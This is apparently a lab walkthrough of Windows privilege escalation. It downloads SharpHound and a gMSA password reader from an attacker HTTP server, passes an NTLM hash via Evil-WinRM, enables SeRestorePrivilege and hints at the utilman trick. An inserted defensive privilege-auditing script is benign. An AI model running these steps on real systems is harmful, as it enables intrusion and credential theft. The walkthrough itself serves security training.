Priv Esc

*Evil-WinRM* PS C:\Users\enox> ls Desktop


    Directory: C:\Users\enox\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/20/2021   4:12 AM                application
-a----        8/29/2024   3:31 AM             34 local.txt
-a----        5/27/2021   7:03 AM            239 todo.txt
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
*Evil-WinRM* PS C:\programdata> curl 192.168.45.233/SharpHound.exe -o SharpHound.exe
*Evil-WinRM* PS C:\programdata> .\SharpHound.exe -c all
*Evil-WinRM* PS C:\programdata> download 20240829042420_BloodHound.zip
*Evil-WinRM* PS C:\programdata> curl 192.168.45.233/GMSAPasswordReader.exe -o GMSAPasswordReader.exe
$ evil-winrm -u 'svc_apache$' -H 4FC1682833B24CF2225248D67DF7E618 -i 192.168.241.165
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeRestorePrivilege is the interesting one here.
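Added example, not part of the original write-up: a small Python auditor that parses the `whoami /priv` table above and flags the privileges Microsoft documents as sensitive. The sample input is the table captured above; the risk list and its one-line descriptions are my own summary, and a privilege is flagged whether its state is Enabled or Disabled, since a holder can enable a disabled privilege on its own token (which is exactly what the EnableSeRestorePrivilege.ps1 script does).

```python
import re

# Constructed sample input: the `whoami /priv` output captured above.
WHOAMI_PRIV_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges that let the holder bypass normal ACL checks or take over other
# security contexts. A service account that does not need one of these
# should not hold it. Descriptions are my own one-line summaries.
HIGH_RISK_PRIVILEGES = {
    "SeRestorePrivilege": "write to any file or registry key regardless of ACL",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including SYSTEM processes",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
    "SeManageVolumePrivilege": "raw access to volumes",
}

# One table row: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    Header, separator and blank lines do not match the row pattern and are skipped.
    """
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def audit_privileges(text):
    """Return [(name, state, why_it_matters)] for every high-risk privilege held.

    Disabled privileges are reported too: "held but disabled" is still held.
    """
    findings = []
    for name, state in parse_whoami_priv(text).items():
        if name in HIGH_RISK_PRIVILEGES:
            findings.append((name, state, HIGH_RISK_PRIVILEGES[name]))
    return findings


if __name__ == "__main__":
    for name, state, why in audit_privileges(WHOAMI_PRIV_OUTPUT):
        print(f"[!] {name} ({state}): {why}")
```

Run it against saved `whoami /priv` output from a service account (here it reports only SeRestorePrivilege); the same parser can be pointed at output collected from several hosts to find accounts holding rights they were never meant to have.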
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> ls


    Directory: C:\Users\svc_apache$\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2021   8:27 AM           3213 EnableSeRestorePrivilege.ps1
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> . .\EnableSeRestorePrivilege.ps1
Debug:
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	[StructLayout(LayoutKind.Sequential, Pack = 1)]
	public struct TokPriv1Luid
	{
		public int Count;
		public long Luid;
		public int Attr;
	}

	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenProcessToken(
			IntPtr ProcessHandle,
			int DesiredAccess,
			ref IntPtr TokenHandle);

		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool LookupPrivilegeValue(
			string lpSystemName,
			string lpName,
			ref long lpLuid);

		[DllImport("advapi32.dll", SetLastError = true)]
		public static extern bool AdjustTokenPrivileges(
			IntPtr TokenHandle,
			bool DisableAllPrivileges,
			ref TokPriv1Luid NewState,
			int BufferLength,
			IntPtr PreviousState,
			IntPtr ReturnLength);

	}

	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	}
Debug: Current process handle: 2696
Debug: Calling OpenProcessToken()
Debug: Token handle: 0
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 6
First attempt fails: the token handle is 0 and error 6 is ERROR_INVALID_HANDLE, so AdjustTokenPrivileges had no valid token to adjust. Calling Enable-SeRestorePrivilege explicitly succeeds (error 0).
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> Enable-SeRestorePrivilege
Debug: Current process handle: 3148
Debug: Calling OpenProcessToken()
Debug: Token handle: 3160
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 0
$ rdesktop 192.168.241.165

Hit Win + U
